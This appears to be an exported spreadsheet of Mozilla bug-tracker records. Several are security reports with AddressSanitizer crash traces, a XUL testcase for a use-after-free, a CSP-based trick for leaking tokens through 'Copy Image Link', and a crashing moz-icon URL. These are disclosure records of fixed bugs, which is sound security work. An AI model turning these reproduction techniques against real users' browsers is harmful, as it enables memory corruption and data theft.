    #6 0x7fd82fd3939e in nsRefPtr&lt;nsIDOMEventListener&gt;::operator nsIDOMEventListener*() const content/events/src/nsEventListenerManager.cpp:818
    #7 0x7fd82fd9979d in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) content/events/src/nsEventListenerManager.h:143
0x7fd80c73caa8 is located 40 bytes inside of 56-byte region [0x7fd80c73ca80,0x7fd80c73cab8)
freed by thread T0 here:
    #0 0x424442 in free 
    #1 0x7fd83186bc99 in mozSpellChecker::Release() extensions/spellcheck/src/mozSpellChecker.cpp:16
    #2 0x7fd83052a870 in nsCOMPtr&lt;nsIInlineSpellChecker&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:442
    #3 0x7fd83052a68d in non-virtual thunk to nsEditor::Observe(nsISupports*, char const*, unsigned short const*) ../../../dist/include/nsCOMPtr.h:757
    #4 0x7fd831ca14e5 in nsTHashtable&lt;nsObserverList&gt;::GetEntry(char const*) const ../../dist/include/nsTHashtable.h:147
previously allocated by thread T0 here:
    #0 0x424502 in __interceptor_malloc 
    #1 0x7fd8349d61a9 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
==7193== ABORTING
Stats: 186M malloced (225M for red zones) by 546881 calls
Stats: 36M realloced by 21270 calls
Stats: 147M freed by 250321 calls
Stats: 13M really freed by 49274 calls
Stats: 420M (107580 full pages) mmaped in 105 calls
  mmaps   by size class: 8:425958; 9:57337; 10:20475; 11:14329; 12:5120; 13:3072; 14:1792; 15:512; 16:704; 17:128; 18:224; 19:40; 20:16;
  mallocs by size class: 8:448516; 9:54348; 10:19102; 11:14230; 12:4418; 13:2919; 14:1824; 15:407; 16:723; 17:119; 18:221; 19:41; 20:13;
  frees   by size class: 8:177903; 9:37821; 10:14745; 11:11000; 12:3384; 13:2594; 14:1557; 15:344; 16:652; 17:98; 18:173; 19:39; 20:11;
  rfrees  by size class: 8:42301; 9:3888; 10:1120; 11:1186; 12:273; 13:185; 14:128; 15:52; 16:129; 17:7; 18:4; 19:1;
Stats: malloc large: 394 small slow: 2548
Shadow byte and word:
  0x1ffb018e7955: fd
  0x1ffb018e7950: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffb018e7930: fd fd fd fd fd fd fd fd
  0x1ffb018e7938: fd fd fd fd fd fd fd fd
  0x1ffb018e7940: fa fa fa fa fa fa fa fa
  0x1ffb018e7948: fa fa fa fa fa fa fa fa
=&gt;0x1ffb018e7950: fd fd fd fd fd fd fd fd
  0x1ffb018e7958: fd fd fd fd fd fd fd fd
  0x1ffb018e7960: fa fa fa fa fa fa fa fa
  0x1ffb018e7968: fa fa fa fa fa fa fa fa
  0x1ffb018e7970: 00 00 00 00 00 00 00 00</t>
        </is>
      </c>
      <c r="X467" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="468">
      <c r="A468" t="n">
        <v>1238558</v>
      </c>
      <c r="B468" t="inlineStr">
        <is>
          <t>2016-01-11 07:00:06 -0800</t>
        </is>
      </c>
      <c r="C468" t="inlineStr">
        <is>
          <t>BMP: [@mozilla::image::imgFrame::ImageUpdated]</t>
        </is>
      </c>
      <c r="D468" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:02 -0700</t>
        </is>
      </c>
      <c r="E468" t="n">
        <v>1</v>
      </c>
      <c r="F468" t="n">
        <v>1</v>
      </c>
      <c r="G468" t="n">
        <v>3</v>
      </c>
      <c r="H468" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I468" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J468" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K468" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L468" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M468" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N468" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O468" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P468" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q468" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R468" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S468" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T468" t="n">
        <v>1</v>
      </c>
      <c r="U468" t="n">
        <v>0</v>
      </c>
      <c r="V468" t="n">
        <v>30</v>
      </c>
      <c r="W468" t="inlineStr">
        <is>
          <t>Testcase might not work, looks related to Threads only.
The following testcase crashes on en-us.linux-x86_64-asan.tar.bz2 revision e55a86dcfdc632d4975a5cebddc8d6f83ab3d28d
See attachment.
Backtrace:
==24096==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f9a7b572866 sp 0x7f9a5bb8bf10 bp 0x7f9a5bb8bf30 T23)
    #0 0x7f9a7b572865 in Lock /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/Mutex.h:69
    #1 0x7f9a7b572865 in Lock /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/Monitor.h:35
    #2 0x7f9a7b572865 in MonitorAutoLock /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/Monitor.h:78
    #3 0x7f9a7b572865 in mozilla::image::imgFrame::ImageUpdated(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/imgFrame.cpp:613
    #4 0x7f9a7b53677e in mozilla::image::Decoder::PostInvalidation(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:474
    #5 0x7f9a7b586935 in mozilla::image::nsBMPDecoder::FinishRow() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:420
    #6 0x7f9a7b586262 in mozilla::image::nsBMPDecoder::FinishInternal() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:243
    #7 0x7f9a7b533ec0 in mozilla::image::Decoder::CompleteDecode() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:196
    #8 0x7f9a7b532aa8 in mozilla::image::Decoder::Decode(mozilla::image::IResumable*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:122
    #9 0x7f9a7b532392 in mozilla::image::DecodePool::Decode(mozilla::image::Decoder*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:455
    #10 0x7f9a7b55164c in mozilla::image::DecodePoolWorker::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:281
    #11 0x7f9a793f57a4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:989
    #12 0x7f9a7946f39a in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #13 0x7f9a79da047f in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:326
    #14 0x7f9a79d0c9fc in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #15 0x7f9a79d0c9fc in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #16 0x7f9a79d0c9fc in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #17 0x7f9a793f12f0 in nsThread::ThreadFunc(void*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:401
    #18 0x7f9a8702b4b5 in _pt_root /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #19 0x7f9a8766a181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/Mutex.h:69 Lock
Thread T23 (ImgDecoder #4) created by T0 (Web Content) here:
    #0 0x461945 in pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0x7f9a87027e3d in _PR_CreateThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:453
    #2 0x7f9a870279ba in PR_CreateThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:544
    #3 0x7f9a793f2a2d in nsThread::Init() /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:521
    #4 0x7f9a793f921e in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThreadManager.cpp:249
    #5 0x7f9a7946e428 in NS_NewThread(nsIThread**, nsIRunnable*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:71
    #6 0x7f9a7b530ef8 in mozilla::image::DecodePool::DecodePool() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:357
    #7 0x7f9a7b53073b in mozilla::image::DecodePool::Singleton() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:314
    #8 0x7f9a7b582e08 in mozilla::image::InitModule() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/build/nsImageModule.cpp:95
    #9 0x7f9a793c6c2d in Load /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/components/nsComponentManager.cpp:898
    #10 0x7f9a793c6c2d in nsFactoryEntry::GetFactory() /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/components/nsComponentManager.cpp:1934
    #11 0x7f9a793c81e7 in nsComponentManagerImpl::CreateInstanceByContractID(char const*, nsISupports*, nsID const&amp;, void**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/components/nsComponentManager.cpp:1232
    #12 0x7f9a793bf0d4 in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/components/nsComponentManager.cpp:1591
    #13 0x7f9a7945f351 in CallGetService /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsComponentManagerUtils.cpp:67
    #14 0x7f9a7945f351 in nsGetServiceByContractID::operator()(nsID const&amp;, void**) const /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsComponentManagerUtils.cpp:280
    #15 0x7f9a79454426 in nsCOMPtr_base::assign_from_gs_contractid(nsGetServiceByContractID, nsID const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsCOMPtr.cpp:103
    #16 0x7f9a7b3b8771 in nsCOMPtr /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/nsCOMPtr.h:540
    #17 0x7f9a7b3b8771 in gfxPlatform::Init() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/thebes/gfxPlatform.cpp:627
    #18 0x7f9a7b3b6b04 in gfxPlatform::GetPlatform() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/thebes/gfxPlatform.cpp:460
    #19 0x7f9a7e984183 in mozilla::dom::ContentProcess::Init() /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/ipc/ContentProcess.cpp:83
    #20 0x7f9a80f04da0 in XRE_InitChildProcess /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:603
    #21 0x48d760 in content_process_main(int, char**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:237
    #22 0x7f9a76cd6ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)</t>
        </is>
      </c>
      <c r="X468" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="469">
      <c r="A469" t="n">
        <v>858820</v>
      </c>
      <c r="B469" t="inlineStr">
        <is>
          <t>2013-04-05 15:30:44 -0700</t>
        </is>
      </c>
      <c r="C469" t="inlineStr">
        <is>
          <t>Clean upsell on deleting</t>
        </is>
      </c>
      <c r="D469" t="inlineStr">
        <is>
          <t>2013-04-25 23:50:49 -0700</t>
        </is>
      </c>
      <c r="E469" t="n">
        <v>1</v>
      </c>
      <c r="F469" t="n">
        <v>1</v>
      </c>
      <c r="G469" t="n">
        <v>6</v>
      </c>
      <c r="H469" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I469" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J469" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K469" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L469" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M469" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N469" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O469" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P469" t="inlineStr">
        <is>
          <t>[fireplace] p=1</t>
        </is>
      </c>
      <c r="Q469" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R469" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S469" t="inlineStr">
        <is>
          <t>2013-04-11</t>
        </is>
      </c>
      <c r="T469" t="n">
        <v>1</v>
      </c>
      <c r="U469" t="n">
        <v>0</v>
      </c>
      <c r="V469" t="n">
        <v>7</v>
      </c>
      <c r="W469" t="inlineStr">
        <is>
          <t>https://marketplace-dev.allizom.org/api/v1/apps/search/?q=
The above URL throws a 500.</t>
        </is>
      </c>
      <c r="X469" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="470">
      <c r="A470" t="n">
        <v>1161719</v>
      </c>
      <c r="B470" t="inlineStr">
        <is>
          <t>2015-05-05 13:05:32 -0700</t>
        </is>
      </c>
      <c r="C470" t="inlineStr">
        <is>
          <t>Possible OOB read in |MediaPipelineFilter::FilterSenderReport|</t>
        </is>
      </c>
      <c r="D470" t="inlineStr">
        <is>
          <t>2018-07-06 11:48:34 -0700</t>
        </is>
      </c>
      <c r="E470" t="n">
        <v>1</v>
      </c>
      <c r="F470" t="n">
        <v>1</v>
      </c>
      <c r="G470" t="n">
        <v>3</v>
      </c>
      <c r="H470" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I470" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J470" t="inlineStr">
        <is>
          <t>WebRTC: Signaling</t>
        </is>
      </c>
      <c r="K470" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L470" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M470" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N470" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O470" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P470" t="inlineStr">
        <is>
          <t>[CID 1294186][CID 1288629][adv-main40+]</t>
        </is>
      </c>
      <c r="Q470" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R470" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S470" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T470" t="n">
        <v>1</v>
      </c>
      <c r="U470" t="n">
        <v>0</v>
      </c>
      <c r="V470" t="n">
        <v>10</v>
      </c>
      <c r="W470" t="inlineStr">
        <is>
          <t>Coverity indicates the possibility of an OOB read in |MediaPipelineFilter::FilterSenderReport| [1]. 
It looks like his can happen if |len &gt;= FIRST_SSRC_OFFSET &amp;&amp; len &lt; FIRST_SSRC_OFFSET+sizeof(uint32_t)|.
Flagging as sec, it's not clear to me if this is an exploitable issue.
[1] https://hg.mozilla.org/mozilla-central/annotate/754579ec0e68/media/webrtc/signaling/src/mediapipeline/MediaPipelineFilter.cpp#l93</t>
        </is>
      </c>
      <c r="X470" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="471">
      <c r="A471" t="n">
        <v>842895</v>
      </c>
      <c r="B471" t="inlineStr">
        <is>
          <t>2013-02-19 20:05:37 -0800</t>
        </is>
      </c>
      <c r="C471" t="inlineStr">
        <is>
          <t>[traceback] Bad localization in 'ko' locale.</t>
        </is>
      </c>
      <c r="D471" t="inlineStr">
        <is>
          <t>2013-02-20 10:03:23 -0800</t>
        </is>
      </c>
      <c r="E471" t="n">
        <v>1</v>
      </c>
      <c r="F471" t="n">
        <v>1</v>
      </c>
      <c r="G471" t="n">
        <v>5</v>
      </c>
      <c r="H471" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I471" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J471" t="inlineStr">
        <is>
          <t>Localization</t>
        </is>
      </c>
      <c r="K471" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N471" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O471" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P471" t="inlineStr">
        <is>
          <t>u=user c=wholedamnsite p=1 s=2013.4</t>
        </is>
      </c>
      <c r="Q471" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R471" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S471" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T471" t="n">
        <v>1</v>
      </c>
      <c r="U471" t="n">
        <v>0</v>
      </c>
      <c r="V471" t="n">
        <v>5</v>
      </c>
      <c r="W471" t="inlineStr">
        <is>
          <t>I tracked this down to the string with msgid "Recently updated threads about %s" in ko/LC_MESSAGES/messages.po. The localizer used a capital S for the format identifier, which is causing site breakage. I don't have svn commit access, or else I would fix this now.
Internal Server Error: /ko/kb/reset-your-master-password-if-you-forgot-it/discuss/feed
Stacktrace (most recent call last):
  File "django/core/handlers/base.py", line 111, in get_response
    response = callback(request, *callback_args, **callback_kwargs)
  File "django/contrib/syndication/views.py", line 38, in __call__
    feedgen = self.get_feed(obj, request)
  File "django/contrib/syndication/views.py", line 104, in get_feed
    title = self.__get_dynamic_attr('title', obj),
  File "django/contrib/syndication/views.py", line 71, in __get_dynamic_attr
    return attr(obj)
  File "kbforums/feeds.py", line 23, in title
    return _('Recently updated threads about %s') % document.title</t>
        </is>
      </c>
      <c r="X471" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="472">
      <c r="A472" t="n">
        <v>617247</v>
      </c>
      <c r="B472" t="inlineStr">
        <is>
          <t>2010-12-06 20:17:05 -0800</t>
        </is>
      </c>
      <c r="C472" t="inlineStr">
        <is>
          <t>Use after free (in nsXULProtypeScript?) when viewing xul document w/JS disabled</t>
        </is>
      </c>
      <c r="D472" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:55 -0700</t>
        </is>
      </c>
      <c r="E472" t="n">
        <v>1</v>
      </c>
      <c r="F472" t="n">
        <v>1</v>
      </c>
      <c r="G472" t="n">
        <v>3</v>
      </c>
      <c r="H472" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I472" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J472" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K472" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L472" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M472" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N472" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O472" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P472" t="inlineStr">
        <is>
          <t>[sg:critical?] (if JS disabled)</t>
        </is>
      </c>
      <c r="Q472" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R472" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S472" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T472" t="n">
        <v>1</v>
      </c>
      <c r="U472" t="n">
        <v>0</v>
      </c>
      <c r="V472" t="n">
        <v>23</v>
      </c>
      <c r="W472" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc14 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc14 Firefox/3.6.12
Under certain conditions, when accessing a xul document in Mozilla Firefox, it appears that some memory is freed which could potentially still be in use. This results in a use after free vulnerability. This issue is highly sensitive to installed add-ons, which makes reliable exploitation rather difficult, but it can be fairly reliably exploited utilizing the popular NoScript add-on. This could potentially also affect other products such as Thunderbird (crashing in XPCOM code), but I have not found a way to demonstrate this. I am able to reproduce this in Firefox rather easily by opening many xul documents when scripts are not allowed for the domain that they are hosted on, then closing the browser. It tends to result in either a hang at exit (which is only easy to notice if running Firefox from a terminal), or result in a segmentation fault. It appears not to have the problem with hanging when running Firefox with gdb (it will simply segfault). I have tested this in both Windows Vista and Linux (Fedora 14).
Reproducible: Sometimes
Steps to Reproduce:
Source of test.xul (referred to in the steps to reproduce):
&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;page xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"&gt;
  &lt;script type="application/javascript"&gt;&lt;![CDATA[
    var t = 1;
  ]]&gt;&lt;/script&gt;
&lt;/page&gt;
1. Install Firefox 3.6.12 and the NoScript add-on.
2. Run firefox attached to a debugger (firefox -g) and open test.xul multiple times (approximately 5). It could be placed on a web server, but was not in this example. 
3. Make sure that NoScript has scripts disabled for the current domain. This may not be necessary, but was done during my tests.
4. Close firefox. When running firefox without gdb, it seems to hang at exit more often than it results in a segmentation fault.
5. Note that (most of the time) there will be a segmentation fault in free, which seems to be caused by a double free. In rare cases, depending on other open pages and various other factors, a function pointer will be overwritten when other memory is allocated with the address of the freed memory. This will result in a jump to an arbitrary location in memory at exit (in my tests, usually 0x1).
Actual Results:  
As mentioned, it will either hang, result in a segmentation fault in free, or jump to an arbitrary address (very rarely).
Expected Results:  
Firefox should properly terminate.
Stack traces and test.xul will be attached.</t>
        </is>
      </c>
      <c r="X472" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="473">
      <c r="A473" t="n">
        <v>1719203</v>
      </c>
      <c r="B473" t="inlineStr">
        <is>
          <t>2021-07-05 12:04:53 -0700</t>
        </is>
      </c>
      <c r="C473" t="inlineStr">
        <is>
          <t>Context-menu "Copy Image Link"  leaks intermediate redirect paths if loading interrupted</t>
        </is>
      </c>
      <c r="D473" t="inlineStr">
        <is>
          <t>2024-05-30 10:34:26 -0700</t>
        </is>
      </c>
      <c r="E473" t="n">
        <v>1</v>
      </c>
      <c r="F473" t="n">
        <v>1</v>
      </c>
      <c r="G473" t="n">
        <v>2</v>
      </c>
      <c r="H473" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I473" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J473" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K473" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L473" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M473" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N473" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O473" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P473" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main94+]</t>
        </is>
      </c>
      <c r="Q473" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R473" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S473" t="inlineStr">
        <is>
          <t>94 Branch</t>
        </is>
      </c>
      <c r="T473" t="n">
        <v>1</v>
      </c>
      <c r="U473" t="n">
        <v>0</v>
      </c>
      <c r="V473" t="n">
        <v>37</v>
      </c>
      <c r="W473" t="inlineStr">
        <is>
          <t>Created attachment 9229778
poc.html
Hello,
The "Copy Image Link" item in the context menu of an image copies the URL after redirects. This data potentially reveals information about the redirect that would not otherwise be known to the original site. This could be used by a malicious site to obtain sensitive information like usernames or single-sign-on tokens encoded within the target URLs.
In cases where the sensitive information is not present in the final URL but instead in a redirect chain, it's possible to use a CSP img-src directive to break the redirect chain where it's needed to leave the image link with the sensitive information.
To perform this attack the victim needs to copy and paste the image link into the attacker's page. 
The POC demonstrates the redirect chain case in a scenario where the user can choose an avatar by copying and pasting its URL in an input field. Each avatar is loaded in a div as a background-image and the malicious image tags are loaded in front of it with opacity:0 to make them transparent. By right-clicking the avatar image to copy its link the victim will be instead interacting with the malicious image tag.
The POC redirect chain works as follow:
1. The image src is set to https://urlwee.com/foqfun1
2. The image src URL will redirect to the sensitive URL https://bit.ly/36esqPj?token=secret123
3. The sensitive URL will redirect to https://example.com
The goal is to leak the https://bit.ly/36esqPj?token=secret123. This is accomplished with the following CSP:
&lt;meta http-equiv="Content-Security-Policy" content="img-src 'self' https://urlwee.com https://bit.ly"&gt;
As the CSP directive doesn't have the https://example.com URL it will block the redirect to it, leaving the image link as https://bit.ly/36esqPj?token=secret123
Video: https://youtu.be/R2kb3fph8PE
Firefox version: 90.0b12 (Windows)</t>
        </is>
      </c>
      <c r="X473" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="474">
      <c r="A474" t="n">
        <v>590116</v>
      </c>
      <c r="B474" t="inlineStr">
        <is>
          <t>2010-08-24 07:20:36 -0700</t>
        </is>
      </c>
      <c r="C474" t="inlineStr">
        <is>
          <t>Stack corruption in Windows' nsIconChannel::MakeInputStream due to GetDIBits being incorrectly used</t>
        </is>
      </c>
      <c r="D474" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:24 -0700</t>
        </is>
      </c>
      <c r="E474" t="n">
        <v>1</v>
      </c>
      <c r="F474" t="n">
        <v>1</v>
      </c>
      <c r="G474" t="n">
        <v>3</v>
      </c>
      <c r="H474" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I474" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J474" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K474" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L474" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M474" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N474" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O474" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P474" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q474" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R474" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S474" t="inlineStr">
        <is>
          <t>mozilla2.0b7</t>
        </is>
      </c>
      <c r="T474" t="n">
        <v>1</v>
      </c>
      <c r="U474" t="n">
        <v>0</v>
      </c>
      <c r="V474" t="n">
        <v>28</v>
      </c>
      <c r="W474" t="inlineStr">
        <is>
          <t>I can reproduce this on the official builds: Mozilla/5.0 (Windows; Windows NT 6.1; WOW64; rv:2.0b3) Gecko/20100805 Firefox/4.0b3 as well as on Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b5pre) Gecko/20100823 Minefield/4.0b5pre (.NET CLR 3.5.30729). However, I can't reproduce this on a debug build, either VC8 or VC10.
A call in nsIconChannel::MakeInputStream [1] to Win32's GetDIBits [2] seems to clobber the stack on returning. This happens whenever this point in code is reached. In most cases those locations aren't touched any more. However, in at least one case at least one location is -- when stockIcon [3] contains a shared string, during its destruction that value on the stack (now 0x00ffffff) is used.
An easy way to trigger a crash on Windows 7 using it is to load the URL moz-icon://stock/uac-shield. This immediately causes a crash, e.g. [4], which I submitted.
